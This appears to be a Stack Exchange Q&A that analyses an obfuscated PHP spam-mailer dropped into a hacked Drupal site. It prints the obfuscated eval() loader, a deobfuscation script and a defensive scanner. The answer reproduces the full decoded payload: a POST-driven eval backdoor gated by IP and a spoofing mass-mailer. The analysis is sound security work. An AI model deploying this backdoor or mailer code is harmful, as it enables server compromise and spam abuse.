'YgGjYGPjYgGjYgGjYB2zSgGObB1We7rM7WUV9RmP8sldRxGcixGdahcpwgbjSxGObzwNU7wMUgGvixG'.
'O9B14ep3SYgGjYgGjYgGSYgGjYgGjYgkG9dUWHRm2YgjO9dG3KfK2'.
'bRw2bElXCWGnSAkp97LOYfK2bRw2bEljSAFSYgGjYgGjYgGSYgGjYgGjYgGObz'.
'wMYy4jYAYTYgmP971O9RKMYy4jYAYTYgmPRsm2UBw0UBwOYy4j9z13bsaTgAGjYgGjYgGjUstX8BaPYg1G9zwn'.
'9AjO9dGXYgOSYgGjYgGjYgkTgAGjYgGjYgGjYgGjYgmW9R5j604jlB9W971OS'.
'gmzbgJj5pGWQgOTYgFIYQBf460mjVgJ46RlngylvVg+46EmjVg'.
'r46EmjAGI6JPjYgGjgAGjYgGjYgGjYgGjYgFIYQgu4eylnVgW46RmjQgD46Gj46El3QgT'.
'460mtcgZ4eFj46ul3QgM46nlnVgW46qlnVgWYQgWYQgD46TlnUBg46RlnUBg46ajSAFSY'.
'gGjYgGjYgGjYgGjH7ePYghjKBtu9Bw497Q497ljKAejbEmWbBcMSgmW9R53YgKbb2NvRfKb8'.
'AYXYp4cmO15a4ajSlPjYgGjYgGjYgGjYgkTgAGjYgGjYgGjYgGjYgGjYgGnSAylVcgJ46ilnVgT46Tl3VgD46jj4'.
'eilVVgrYQBk4eulvQBg46ylnUB6Yg4j46qlnVBG4eylVUgD4e6lvQBG4eilVUgFYQgD46TlnUBg46RlnUBgYg'.
'PngAGjYgGjYgGjYgGjYgGjYgGOH1cO9Rm2eEm29gGcYfmWU7aTgAGjYgGjYgGjYg'.
'GjYgGjYgGSYgGjYgGjYgGjYgGjYgGjYgmP971O9RKMYy4jbEwAbEmWSgmW9R53YyG3YfQ4bdknbWjObzwM6gG'.
'ARfKb82NWRBZASxOTgAGjYgGjYgGjYgGjYgGjYgGObzwMYy4jbEwAbEmWSgmW9R53YfQ4bdknbWjObzwM6gGARfKb82NWRBZAS'.
'x34Sp3SYgGjYgGjYgGjYgGjYgGjYGPjYgGjYgGjYgGjYgGjYgGj6WPjxBwt9Bw'.
'WbWk48WkkbdKtoxGI6JPjYgGjYgGjYgGjYgGjYgGjH7ePYgmJeRKt8RQ8KEK2UfwW8AUUip4dHBwt9BwWbWbjufJjKfktbz1Vb'.
'r3dbzw4URKvKr4cixUtbdKtoxbSYgGjYgGjYgGjYgGjYgGjYgGjYgkFugGPHRQM9RlPKfkt'.
'bz1Vbr3dbzwOHRK2eEldRxOjKAejKfktbz1Vbr3dbzwOHRK2eE'.
'ldRp4cUfKr9xOjSlPjYgGjYgGjYgGjYgGjYgGjoJPjYgGjYgGjYgGjYgGjYgGjYgGjYgmPYy4j9RtJ8BcO9xjARfKb8AY3Yg'.
'mP971O9RKMSp3SYgGjYgGjYgGjYgGjYgGjYgGjYgGOHBwt9BwWbWGcYB1Wbz1LSgOTgAGjYgGjYgGjYg'.
'GjYgGjYgGjYgGj9zcW9710HgjjKBjjeR5jKB3ciAmsYgOSYgGjYgGjY'.
'gGjYgGjYgGjYgGjYgkTgAGjYgGjYgGjYgGjYgGjYgGjYgGjYgGjYB2zSgk'.
'MUfKJ8E5PKfe3YgbDKWOjSlPjYgGjYgGjYgGjYgGjYgGjYgGjYgGjYgkTgAGjYgGjYgGjYgGjYgGjYgGjYgGjYgGjYgGj'.
'YgGOHWGcYfQredQ4bAjOUAJj5gJjbEmWbBcMSgms6gGdCAbXSp3SYgGjYgGjYgGjYgGjYgGjYgGjYgGjYgGjY'.
'gGjYgmsYy4jUfKX8xtMU7KMUfYPKfe3YfQ4bdknbWjOUAJjKMPdSx3NSxOTgAGjYgGjYgGjYgGjYgGjYgGjYgGjYgG'.
'jYf4SYgGjYgGjYgGjYgGjYgGjYgGjYgGjYgGjKBt2e7m2bdQ8bEmWUBcrbfk2bAjOHW2UYy4jKfeTgAGjYgGjYgGjYgG'.
'jYgGjYgGjYgGjulPjYgGjYgGjYgGjYgGjYgGjulPjYgGjYgGjYgGjYgGjYgGjH7ePYB2Mb'.
'sw4SgmJeRKt8RQ8KEK29B2W97Q4Kr4XYgezYgmJeRKt8RQ8KEK29B2W97Q4Kr4ciRmWU7ajKAejH'.
'RQM9RlPKBt2e7m2bdQ8K4Nil41axacCKr4XYgOSYgGjYgGjYgGjYgGjYgGjYf3SYgGjYgGjYgGjYgG'.
'jYgGjYgGjYgGObB1We7rM7WUrbzJdRxGcYgmP971O9RKM7WU5p4Qkwh2ipAUUCJ'.
'PjYgGjYgGjYgGjYgGjYgGjYgGjYB2zSgGtHRQM9RlPKfktbz1Vbr3dbzwOHRK2eEl'.
'Vescr8dldRxOjSxGObB1We7rM7WUW97mXbzw0Ugr08EwvUgUUYy4j5y3SYgGjYgG'.
'jYgGjYgGjYgGjYgGjYgkX9AjjKfktbz1Vbr3dbzwOHRK2eElVescr8dldRpJN5gGXgAGjYgGjYgGjYgGjYgGj'.
'YgGjYgGjoJPjYgGjYgGjYgGjYgGjYgGjYgGjYgGjYgGObB1We7rM7WUW97mXbzw0Ugr08EwvUgUUS'.
'W3TgAGjYgGjYgGjYgGjYgGjYgGjYgGjYgGjYgmzU7L0Yy4jRrcBwaLywh2ip2cuCJPjYgGjYgGjYgGjYgGjYgGjYgGjYgGj'.
'YgkW9RmrbzZjlB2MRscAHzw0UgjOUBtXbWOjiWGOUBtXbW4+KB9r8'.
'z5PKfktbz1VbWOjCAGO9dwveWjObB1We7rMSp3SYgGjYgGjYgGjYgGjYgGjYgGjYgk'.
'cgAGjYgGjYgGjYgGjYgGjYgkcgAGjYgGjYgGjYgGjYgGjYgkX9AjjKfktbz1Vbr3dbzw4URKvKr4cixUP971O9RKMKWGXYfK2'.
'UfwW8AGOHBwt9BwWbM3SYgGjYgGjYgGjYgGjulPjYgGjYgGjYf4SYgGjYgGjYgGSYgGjYgGjYgkG9zQ38EQ2SgmzbgOTgA'.
'GjYgkcgAGjYgk28fQ2YfK2UfwW8AkBlaNpmp3nSAGO9RKWbEmW6Am2bdKv8M3jSAFSYgGjYGPjYgGjH'.
'7ePYgmJeRKt8RQ8KEK2UfwW8AUUip4deRKWeROdYgOjKfK2bWGcYB1Wbz1LSgUP971O9RKMKM4+KBt2e7'.
'm2bd53YgU08sL497L4KM4+KfK2bWOTgAGjYgGSYgGjYfK2UfwW'.
'8AGObzwMCJXc';
eval(v78ZFAX($vFHLJ89, $vIIJ30Y));?>

I think it was used to send spam like this:

To: <[email protected]>
Subject: 55th Anniversary and Free Pizza
X-PHP-Originating-Script: 763659:template46.php(236) : eval()'d code

But how? What is its method of operation?

A bit more background:

It was found in a Drupal 7 instance at sites/all/modules/contrib/ctools/stylizer/plugins/export_ui/template46.php, however the file and the code may vary depending on the hack.

A user reported it in sites/all/modules/i18n/i18n_block/stats7.php and the contents of that script were slightly different:

<?php
$vNWZ3B7 = Array('1'=>'6', '0'=>'e', '3'=>'8', '2'=>'L', '5'=>'v', '4'=>'M', '7'=>'2', '6'=>'s', '9'=>'r', '8'=>'q', 'A'=>'l', 'C'=>'Y', 'B'=>'S', 'E'=>'K', 'D'=>'n', 'G'=>'T', 'F'=>'C', 'I'=>'y', 'H'=>'t', 'K'=>'G', 'J'=>'9', 'M'=>'k', 'L'=>'w', 'O'=>'H', 'N'=>'x', 'Q'=>'m', 'P'=>'E', 'S'=>'j', 'R'=>'O', 'U'=>'7', 'T'=>'4', 'W'=>'X', 'V'=>'D', 'Y'=>'d', 'X'=>'Z', 'Z'=>'I', 'a'=>'z', 'c'=>'R', 'b'=>'0', 'e'=>'B', 'd'=>'N', 'g'=>'h', 'f'=>'P', 'i'=>'o', 'h'=>'W', 'k'=>'c', 'j'=>'3', 'm'=>'A', 'l'=>'a', 'o'=>'f', 'n'=>'p', 'q'=>'F', 'p'=>'b', 's'=>'5', 'r'=>'g', 'u'=>'J', 't'=>'u', 'w'=>'U', 'v'=>'V', 'y'=>'Q', 'x'=>'1', 'z'=>'i');
function v5T7ETO($vQF6A3S, $vP8XOME){$v8YITRE = ''; for($i=0; $i < strlen($vQF6A3S); $i++){$v8YITRE .= isset($vP8XOME[$vQF6A3S[$i]]) ? $vP8XOME[$vQF6A3S[$i]] : $vQF6A3S[$i];}
return base64_decode($v8YITRE);}
$vC3WWUF = 'FQAQEKAak7vbEFcowPJGvq6zC7JMXBuYEBmQuzenkjdAYFrMWxefwxc'.
'pZQdxkjc5pvJgCjcnp7TzWBMruzCrlWdoX7J5XqJnkFrMWxdqwAXqw'.
    
posted by kenorb 15.04.2015 - 17:55
source
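Because the asker notes that the file name and the code vary from one compromised site to the next, a triage pass over the whole web root that looks for the shape of this dropper, rather than for one file name, is the natural next step. The scanner below is an added example and is not code from the question, from Drupal or from any module named above: it scores each PHP file on the four traits visible in template46.php (an eval() fed by a function call, a base64_decode() call, an Array() mapping single characters to single characters, and a long run of concatenated single-quoted fragments). The extension list, the scoring threshold, the directory layout and the two sample files it writes are constructed assumptions.

```python
"""Triage scanner for droppers shaped like template46.php / stats7.php (added example)."""
import os
import re
import tempfile

# eval(v78ZFAX(...)): eval fed by a user-defined function rather than a literal.
EVAL_OF_CALL_RE = re.compile(r"\beval\s*\(\s*\w+\s*\(")
BASE64_DECODE_RE = re.compile(r"\bbase64_decode\s*\(")
# Array('1'=>'F', '0'=>'j', ...): at least 40 one-char => one-char pairs.
SINGLE_CHAR_MAP_RE = re.compile(r"Array\s*\((?:'.'\s*=>\s*'.'\s*,\s*){40,}")
# 'xxxxxxxx'.'xxxxxxxx'. ...: five or more quoted fragments glued with '.'.
CONCAT_BLOB_RE = re.compile(r"(?:'[A-Za-z0-9+/=]{8,}'\s*\.\s*){5,}")

TRAITS = {
    "eval_of_function_call": EVAL_OF_CALL_RE,
    "base64_decode": BASE64_DECODE_RE,
    "single_char_map": SINGLE_CHAR_MAP_RE,
    "concatenated_blob": CONCAT_BLOB_RE,
}


def score_source(src):
    """Return {trait: bool, ..., 'score': number of traits present}."""
    hits = {name: bool(rx.search(src)) for name, rx in TRAITS.items()}
    hits["score"] = sum(hits[name] for name in TRAITS)
    return hits


def scan_webroot(root, threshold=3, exts=(".php", ".phtml", ".inc")):
    """Return sorted [(path relative to root, hits)] for files scoring >= threshold."""
    flagged = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = score_source(fh.read())
            except OSError:
                continue  # unreadable file: skip it, do not abort the sweep
            if hits["score"] >= threshold:
                flagged.append((os.path.relpath(path, root), hits))
    return sorted(flagged)


# --- constructed samples (not the real files) used to exercise the scanner ---
_ALNUM = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
SAMPLE_DROPPER = (
    "<?php\n$vMAP = Array(" + ", ".join("'%s'=>'%s'" % (c, c) for c in _ALNUM) + ");\n"
    "function vX($s, $m){$o = ''; for($i=0; $i < strlen($s); $i++){"
    "$o .= isset($m[$s[$i]]) ? $m[$s[$i]] : $s[$i];} return base64_decode($o);}\n"
    "$vBLOB = " + ".\n".join("'" + "Q" * 24 + "'" for _ in range(8)) + ";\n"
    "eval(vX($vBLOB, $vMAP));?>\n"
)
SAMPLE_BENIGN = "<?php\n// ordinary module file\nfunction hello() { return 'hi'; }\n"


def demo():
    """Write the two samples into a throwaway tree and return what the scan flags."""
    with tempfile.TemporaryDirectory() as root:
        bad_dir = os.path.join(root, "sites", "all", "modules", "contrib", "ctools")
        os.makedirs(bad_dir)
        with open(os.path.join(bad_dir, "template46.php"), "w") as fh:
            fh.write(SAMPLE_DROPPER)
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write(SAMPLE_BENIGN)
        return scan_webroot(root)


if __name__ == "__main__":
    for rel_path, hits in demo():
        print(rel_path, hits)
```

Point scan_webroot() at the real document root to sweep a site; a score of 3 or 4 is worth opening by hand, and each flagged file's mtime and owner can then be compared against the deployment history.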

4 answers

29

The last line runs an eval() of the function v78ZFAX() given the two parameters, like so:

eval(v78ZFAX($vFHLJ89, $vIIJ30Y));

This first parameter is the part that takes up most of the code. It is assigned all that random-looking garbage, with . concatenating all of those strings together into one long string:

$vFHLJ89 = 'gz2zSB2Mbsw4Sgmuahcpw13AescO9xKUSxGzKAkXbEQ2UgjORrkiarm8YzQrbEmn8wcteEmX8sZARxOjKAejHRQu9scn91cXb'.'gjORrQ1a291a23daOwQprm1R41hm1YdRxOXgd3Sg7wse7JPez1M9pe4Rsm2escO'.'9xjORrkiarm8YzQn9BaARxOXCJPK9RtXUgjXCJXcgjXX9AGPHRQM9RlPK1clprQa7WK4oRk' ...

The second parameter is this array, which maps certain letters/numbers to other letters/numbers:

$vIIJ30Y = Array(
    '1'=>'F', '0'=>'j', '3'=>'s', '2'=>'l', '5'=>'M', '4'=>'0', '7'=>'W', '6'=>'L', '9'=>'Z', '8'=>'b', 'A'=>'i', 'C'=>'O', 'B'=>'G', 'E'=>'3', 'D'=>'6', 'G'=>'A', 'F'=>'8', 'I'=>'q', 'H'=>'a', 'K'=>'J', 'J'=>'w', 'M'=>'z', 'L'=>'5', 'O'=>'k', 'N'=>'x', 'Q'=>'N', 'P'=>'o', 'S'=>'K', 'R'=>'X', 'U'=>'d', 'T'=>'7', 'W'=>'y', 'V'=>'t', 'Y'=>'I', 'X'=>'p', 'Z'=>'4', 'a'=>'U', 'c'=>'9', 'b'=>'c', 'e'=>'Y', 'd'=>'n', 'g'=>'C', 'f'=>'H', 'i'=>'P', 'h'=>'E', 'k'=>'B', 'j'=>'g', 'm'=>'R', 'l'=>'Q', 'o'=>'e', 'n'=>'v', 'q'=>'r', 'p'=>'T', 's'=>'2', 'r'=>'1', 'u'=>'f', 't'=>'h', 'w'=>'V', 'v'=>'u', 'y'=>'D', 'x'=>'S', 'z'=>'m');

The function itself can be rewritten for clarity:

function v78ZFAX($vJOJJ7T, $vRJ8WGX)
{
    $vM74216 = ''; 
    for($i=0; $i < strlen($vJOJJ7T); $i++)
    {
        $vM74216 .= isset($vRJ8WGX[$vJOJJ7T[$i]]) ? $vRJ8WGX[$vJOJJ7T[$i]] : $vJOJJ7T[$i];
    }
    return base64_decode($vM74216);
}

It starts by declaring an empty variable vM74216 and then, for each digit of the first variable (the super long one), appends a character to this currently empty variable. The digit appended depends on the result of the ternary condition using the isset() function, which simply checks whether the i-th digit of the huge number has a corresponding lookup entry in the character mapping array.

At the end of it all, Base64 decodes the resulting variable, which is passed as the derived parameter of the initial eval() function.

The whole point is obfuscation. It looks like a confusing mess, but the characters get swapped, concatenated, etc. until its payload is released. This is done to keep an analyst from immediately knowing the nature of the script, as well as to bypass signature-based antivirus techniques.

Edit

Using this hack of a Python script (I feel more comfortable in Python):

import base64

# Copy of the $vIIJ30Y character map from the PHP script.
TheArray = {'1':'F', '0':'j', '3':'s', '2':'l', '5':'M', '4':'0', '7':'W', '6':'L', '9':'Z', '8':'b', 'A':'i', 'C':'O', 'B':'G', 'E':'3', 'D':'6', 'G':'A', 'F':'8', 'I':'q', 'H':'a', 'K':'J', 'J':'w', 'M':'z', 'L':'5', 'O':'k', 'N':'x', 'Q':'N', 'P':'o', 'S':'K', 'R':'X', 'U':'d', 'T':'7', 'W':'y', 'V':'t', 'Y':'I', 'X':'p', 'Z':'4', 'a':'U', 'c':'9', 'b':'c', 'e':'Y', 'd':'n', 'g':'C', 'f':'H', 'i':'P', 'h':'E', 'k':'B', 'j':'g', 'm':'R', 'l':'Q', 'o':'e', 'n':'v', 'q':'r', 'p':'T', 's':'2', 'r':'1', 'u':'f', 't':'h', 'w':'V', 'v':'u', 'y':'D', 'x':'S', 'z':'m'}

# Copy of $vFHLJ89, the concatenated blob (trimmed here to fit the answer length limit).
LongVar = 'gz2zSB2Mbsw4Sgmuahcpw13AescO9xKUSxGzKAkXbEQ2UgjORrkiarm8YzQrbEmn8wcteEmX8sZARxOjKAejHRQu9scn91cXb'+'gjORrQ1a291a23daOwQprm1R41hm1YdRxOXgd3Sg7wse7JPez1M9pe4Rsm2escO'+'9xjORrkiarm8YzQn9BaARxOXCJPK9RtXUgjXCJXcgjXX9AGPHRQM9RlPK1clprQa7WK4oRk'+'2Y24XYgezYgmuahcpw13AUf2J9xKUip4A5xYXgd3SgRmLbBaNREQ28zlPSp3Sg7wZHRlPSp3SulX28fQ2H7ejSB2Mbsw4S'+'gmuahcpw13AUf2J9xKUSxGzKAGORrkiarm8YdmLbBaARp4cY0YASlXTgjXcgzw3bswX9'+'AGPHRQM9RlPK1clprQa7WK4oRk2Y24XSlXTgj22estnYgmuahcpw13AUf2J9xKUCJPK9RtXUgjXCJXcgjX2bdKnb2F45ylP'+'Sp3Sgz9r8zQ4H7cvYB2MRsUn8smuHRGPKB2JSlXTgjOO9scn9f5jixkkbdKtoxjAQAZNCyav505L6AY3Y'+'gYZ60hMCgZN5pjvYAOTgjOSg79nbzwtesjjSgmd8scObWktbWGO9scn9gOSgR3Sgl2X9AGPbEmWbEmWS'+'gmXbgJjKBUn8slXYghcYh9kp1Q1SlPKgR3SglOKbzw4URKvY1mxwaaTgjOKul'+'PKulPKgj2W9RmrbzZjmO15a4aTgd4Sgz9r8zQ4H7cvYfmLbBaNREQ28zlPSlXTgj2X9AjtHRQM9RlPK1clprQa7WK2871X8f5A'+'RxOSglOKprYjY72Mbsw4Sgmuahcpw13AUBt287wMY24XgjOKgacxYg1XbEQ2UgjORrki'+'arm8Yzr2bEQt9swMY24XgjOKgacxYg1XbEQ2UgjORrkiarm8Yz9W8srMY24XgjOKgacxYg1XbEQ2Ug'+'jORrkiarm8YzrtH7N2bd5ARxOSgxOSgR3Sgl22oB24SgOTgj2cgjPKH7eP9sw4Rsrt9s20RE1r'+'8Em2brcdbB5PSxOSgR3Sgl2z8EK2e7QPSgmuahcpwgktbWGOHswLYy4+YgmJ8EQ4SlPKg'+'R3SglOKK1clprQa7Wmq9R2UYy4jbEmWHRk0bsNtbst2bWjObBcMUgOTgjOKulPKulPSgxm'+'2871X8f5jixkGU7LM9RKXe7NXozaPez1M9pe4Rsm2escO9xjORrkiarm8YzwVe723bWK'+'USxOTgjOOUBt287wMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WK4HBwV9R5AR'+'xOXCJPKKBr2bEQt9swMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WKV9RQ'+'Me7U2bWKUSxOTgjOO9dKn8R5jixkGU7LM9RKXe7NXozaPez1M9pe4Rsm2escO'+'9xjORrkiarm8Yz9W8srMY24XSp3SgxmVe7239RKMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WKVe7239R'+'KMY24XSp3Sgxmt8B2tbswMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WK'+'t8B2tbswMY24XSp3SgxmJeRQM9R5jixkGU7LM9RKXe7NXozaPez1M9pe4Rsm2escO9xj'+'ORrkiarm8YdktbEQ2bWKUSxOTgjPKH7ePHRQM9RlPK1cpmwK7mwYXSlP'+'KoJPKgxmua4wxwOwx7WUlx1kua4w5mAUUYy4jYAFACWGSglOORrQ1a291a23daOwQprm1R41'+'hm1YdRxGcYgYN50bv5gZJ60hACJPKg72zSg128Rk4oxjORrQ1a291'+'a23dx1maa1ceR49ia2UkaOm1m1cBprYdRxOXgjOKoJPKglOORrQ1a291a23dx1maa1ceR49ia2UkaOm1m1cB'+'prYdRxGcYgYN50bv5gZJ60hACJPKgR4SgR4Sgj2X9AtXbEQ2UgjOR49KphwpSxOSgR3Sgl2z8EK2e7QPSgmumO25mw5jeR5jK'+'BV2oxGciAGO9z239xOSgl2TgjOKgxmzH7N28z1V9xGcYB13UBwWRsrteEKnbWjOe7NXeRQ2br3OHs'+'wLRxOTgjOKgxmzH7N28z1V9xGcYBLr8wcVe7QW8E5PKB9X8Bwve7r2Sp3SglOKK'+'B9X8Bwve7r2Yy4jUBwZU1cVe7QW8E5PKB9X8Bwve7r2Sp3SglOKKB9X8Bwv'+'e7r2Yy4joBLr8wcVe7QW8E5PKB9X8Bwve7r2Sp3SglOKK1cBxaN1ar3OHswLRw3A8z1V9xKUYy4jKB9X8Bwve7r2CJP'.... TRIMMED FOR SE ANSWER CHAR COUNT

NewVar = ''

# Same loop as v78ZFAX(): swap each character through the map, pass the rest through.
for i in LongVar:
    if i in TheArray:
        NewVar += TheArray[i]
    else:
        NewVar += i

# Base64-decode the substituted string and print the recovered PHP source.
print(base64.b64decode(NewVar).decode('utf-8', 'replace'))

I managed to extract the deobfuscated payload as:

if(isset($_POST["code"]) && isset($_POST["custom_action"]) && is_good_ip($_SERVER['REMOTE_ADDR']))
{
    eval(base64_decode($_POST["code"]));
    exit();
}

if (isset($_POST["type"]) && $_POST["type"]=="1")
{
    type1_send();
    exit();
}
elseif (isset($_POST["type"]) && $_POST["type"]=="2")
{

}
elseif (isset($_POST["type"]))
{
    echo $_POST["type"];
    exit();
}

error_404();

function is_good_ip($ip)
{
    $goods = Array("6.185.239.", "8.138.118.");

    foreach ($goods as $good)
    {
        if (strstr($ip, $good) != FALSE)
        {
            return TRUE;
        }
    }

    return FALSE;
}

function type1_send()
{
    if(!isset($_POST["emails"])
            OR !isset($_POST["themes"])
            OR !isset($_POST["messages"])
            OR !isset($_POST["froms"])
            OR !isset($_POST["mailers"])
    )
    {
        exit();
    }

    if(get_magic_quotes_gpc())
    {
        foreach($_POST as $key => $post)
        {
            $_POST[$key] = stripcslashes($post);
        }
    }

    $emails = @unserialize(base64_decode($_POST["emails"]));
    $themes = @unserialize(base64_decode($_POST["themes"]));
    $messages = @unserialize(base64_decode($_POST["messages"]));
    $froms = @unserialize(base64_decode($_POST["froms"]));
    $mailers = @unserialize(base64_decode($_POST["mailers"]));
    $aliases = @unserialize(base64_decode($_POST["aliases"]));
    $passes = @unserialize(base64_decode($_POST["passes"]));

    if(isset($_SERVER))
    {
        $_SERVER['PHP_SELF'] = "/"; 
        $_SERVER['REMOTE_ADDR'] = "127.0.0.1";
        if(!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
        {
            $_SERVER['HTTP_X_FORWARDED_FOR'] = "127.0.0.1";
        }
    }

    if(isset($_FILES))
    {
        foreach($_FILES as $key => $file)
        {
            $filename = alter_macros($aliases[$key]);
            $filename = num_macros($filename);
            $filename = text_macros($filename);
            $filename = xnum_macros($filename);
            $_FILES[$key]["name"] = $filename;
        }
    }

    if(empty($emails))
    {
        exit();
    }

    foreach ($emails as $fteil => $email)
    {
        $theme = $themes[array_rand($themes)];
        $theme = alter_macros($theme["theme"]);
        $theme = num_macros($theme);
        $theme = text_macros($theme);
        $theme = xnum_macros($theme);

        $message = $messages[array_rand($messages)];
        $message = alter_macros($message["message"]);
        $message = num_macros($message);
        $message = text_macros($message);
        $message = xnum_macros($message);
        //$message = pass_macros($message, $passes);
        $message = fteil_macros($message, $fteil);

        $from = $froms[array_rand($froms)];
        $from = alter_macros($from["from"]);
        $from = num_macros($from);
        $from = text_macros($from);
        $from = xnum_macros($from);

        if (strstr($from, "[CUSTOM]") == FALSE)
        {
            $from = from_host($from);
        }
        else
        {
            $from = str_replace("[CUSTOM]", "", $from);
        }

        $mailer = $mailers[array_rand($mailers)];

        send_mail($from, $email, $theme, $message, $mailer);
    }
}

function send_mail($from, $to, $subj, $text, $mailer)
{
    $head = "";

    $un = strtoupper(uniqid(time()));

    $head .= "From: $from\n";
    $head .= "X-Mailer: $mailer\n";
    $head .= "Reply-To: $from\n";

    $head .= "Mime-Version: 1.0\n";
    $head .= "Content-Type: multipart/alternative;";
    $head .= "boundary=\"----------".$un."\"\n\n";

    $plain = strip_tags($text);
    $zag = "------------".$un."\nContent-Type: text/plain; charset=\"ISO-8859-1\"; format=flowed\n";
    $zag .= "Content-Transfer-Encoding: 7bit\n\n".$plain."\n\n";

    $zag .= "------------".$un."\nContent-Type: text/html; charset=\"ISO-8859-1\";\n";
    $zag .= "Content-Transfer-Encoding: 7bit\n\n$text\n\n";
    $zag .= "------------".$un."--";

    if(count($_FILES) > 0)
    {
        foreach($_FILES as $file)
        {
            if(file_exists($file["tmp_name"]))
            {
                $f = fopen($file["tmp_name"], "rb");
                $zag .= "------------".$un."\n";
                $zag .= "Content-Type: application/octet-stream;";
                $zag .= "name=\"".$file["name"]."\"\n";
                $zag .= "Content-Transfer-Encoding:base64\n";
                $zag .= "Content-Disposition:attachment;";
                $zag .= "filename=\"".$file["name"]."\"\n\n";
                $zag .= chunk_split(base64_encode(fread($f, filesize($file["tmp_name"]))))."\n";
                fclose($f);
            }
        }
    }

    if(@mail($to, $subj, $zag, $head))
    {
        if(!empty($_POST['verbose']))
            echo "SENDED";
    }
    else
    {
        if(!empty($_POST['verbose']))
            echo "FAIL";
    }
}

function alter_macros($content)
{
    preg_match_all('#{(.*)}#Ui', $content, $matches);

    for($i = 0; $i < count($matches[1]); $i++)
    {

        $ns = explode("|", $matches[1][$i]);
        $c2 = count($ns);
        $rand = rand(0, ($c2 - 1));
        $content = str_replace("{".$matches[1][$i]."}", $ns[$rand], $content);
    }
    return $content;
}

function text_macros($content)
{
    preg_match_all('#\[TEXT\-([[:digit:]]+)\-([[:digit:]]+)\]#', $content, $matches);

    for($i = 0; $i < count($matches[0]); $i++)
    {
        $min = $matches[1][$i];
        $max = $matches[2][$i];
        $rand = rand($min, $max);
        $word = generate_word($rand);

        $content = preg_replace("/".preg_quote($matches[0][$i])."/", $word, $content, 1);
    }

    preg_match_all('#\[TEXT\-([[:digit:]]+)\]#', $content, $matches);

    for($i = 0; $i < count($matches[0]); $i++)
    {
        $count = $matches[1][$i];

        $word  = generate_word($count);

        $content = preg_replace("/".preg_quote($matches[0][$i])."/", $word, $content, 1);
    }


    return $content;
}

function xnum_macros($content)
{
    preg_match_all('#\[NUM\-([[:digit:]]+)\]#', $content, $matches);

    for($i = 0; $i < count($matches[0]); $i++)
    {
        $num = $matches[1][$i];
        $min = pow(10, $num - 1);
        $max = pow(10, $num) - 1;

        $rand = rand($min, $max);
        $content = str_replace($matches[0][$i], $rand, $content);
    }
    return $content;
}

function num_macros($content)
{
    preg_match_all('#\[RAND\-([[:digit:]]+)\-([[:digit:]]+)\]#', $content, $matches);

    for($i = 0; $i < count($matches[0]); $i++)
    {
        $min = $matches[1][$i];
        $max = $matches[2][$i];
        $rand = rand($min, $max);
        $content = str_replace($matches[0][$i], $rand, $content);
    }
    return $content;
}

function generate_word($length)
{
    $chars = 'abcdefghijklmnopqrstuvyxz';
    $numChars = strlen($chars);
    $string = '';
    for($i = 0; $i < $length; $i++)
    {
        $string .= substr($chars, rand(1, $numChars) - 1, 1);
    }
    return $string;
}

function pass_macros($content, $passes)
{
    $pass = array_pop($passes);

    return str_replace("[PASS]", $pass, $content);
}

function fteil_macros($content, $fteil)
{    
    return str_replace("[FTEIL]", $fteil, $content);
}

function is_ip($str) {
  return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/",$str);
}

function from_host($content)
{

    $host = preg_replace('/^(www|ftp)\./i','',@$_SERVER['HTTP_HOST']);

    if (is_ip($host))
    {
        return $content;
    }

    $tokens = explode("@", $content);

    $content = $tokens[0] . "@" . $host . ">";

    return $content;
}

function error_404()
{
    header("HTTP/1.1 404 Not Found");

    $uri = preg_replace('/(\?).*$/', '', $_SERVER['REQUEST_URI'] );

    $content = custom_http_request1("http://".$_SERVER['HTTP_HOST']."/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA");
    $content = str_replace( "/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA", $uri, $content );

    exit( $content );
}


function custom_http_request1($params)
{
    if( ! is_array($params) )
    {
        $params = array(
            'url' => $params,
            'method' => 'GET'
        );
    }

    if( $params['url']=='' ) return FALSE;

    if( ! isset($params['method']) ) $params['method'] = (isset($params['data'])&&is_array($params['data'])) ? 'POST' : 'GET';
    $params['method'] = strtoupper($params['method']);
    if( ! in_array($params['method'], array('GET', 'POST')) ) return FALSE; 

    /* Приводим ссылку в правильный вид */
    $url = parse_url($params['url']);
    if( ! isset($url['scheme']) ) $url['scheme'] = 'http';
    if( ! isset($url['path']) ) $url['path'] = '/';
    if( ! isset($url['host']) && isset($url['path']) )
    {
        if( strpos($url['path'], '/') )
        {
            $url['host'] = substr($url['path'], 0, strpos($url['path'], '/'));
            $url['path'] = substr($url['path'], strpos($url['path'], '/'));
        }
        else
        {
            $url['host'] = $url['path'];
            $url['path'] = '/'; 
        }
    }
    $url['path'] = preg_replace("/[\/]+/", "/", $url['path']);
    if( isset($url['query']) ) $url['path'] .= "?{$url['query']}";

    $port = isset($params['port']) ? $params['port']
            : ( isset($url['port']) ? $url['port'] : ($url['scheme']=='https'?443:80) );

    $timeout = isset($params['timeout']) ? $params['timeout'] : 30;
    if( ! isset($params['return']) ) $params['return'] = 'content';

    $scheme = $url['scheme']=='https' ? 'ssl://':'';
    $fp = @fsockopen($scheme.$url['host'], $port, $errno, $errstr, $timeout);
    if( $fp )
    {
        /* Mozilla */
        if( ! isset($params['User-Agent']) ) $params['User-Agent'] = "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16";

        $request = "{$params['method']} {$url['path']} HTTP/1.0\r\n";
        $request .= "Host: {$url['host']}\r\n";
        $request .= "User-Agent: {$params['User-Agent']}"."\r\n";
        if( isset($params['referer']) ) $request .= "Referer: {$params['referer']}\r\n";
